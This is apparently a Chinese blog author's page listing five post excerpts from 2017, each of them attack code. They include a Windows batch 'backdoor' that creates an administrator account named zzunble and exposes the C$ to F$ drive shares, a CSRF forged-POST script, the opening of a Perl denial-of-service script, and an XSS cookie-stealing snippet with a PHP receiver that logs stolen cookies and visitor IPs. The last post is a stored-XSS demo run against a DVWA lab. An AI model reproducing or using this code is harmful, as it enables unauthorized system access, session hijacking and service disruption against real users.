- 博客(5)
- 资源 (1)
- 收藏
- 关注
原创 代码篇——————windows后门代码
@echo off @net user zzunble zzunble.net /add@net localgroup administrators zzunble /add@net share c$=c:@net share d$=d:@net share e$=e:@net share f$=f:@echo 3>c:\windows\system32\t1.
2017-03-21 12:33:38 989
原创 CSRF攻击代码
This page forges an HTTP POST request. function post(url,fields) { //create a element. var p = document.createElement("form"); //construct the form p.action = url; p.inne
2017-03-13 17:47:43 862
转载 利用perl脚本执行拒绝攻击的代码
#!/usr/bin/perl -wuse strict;use IO::Socket::INET;use IO::Socket::SSL;use Getopt::Long;use Config;$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errorsprint CCCCCCCCCCOOCCOOOOO88
2017-03-13 10:40:08 1939
原创 接收cookie代码与注入盗取cookie代码参考
document.write('');alert(/XSS/)$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间$referer=
2017-03-13 10:34:53 2117
原创 实例演示——————简单演示XSS store攻击,便于学习理解XSS store
此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。一,环境搭建 1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。 2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者
2017-03-09 11:16:41 2275
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人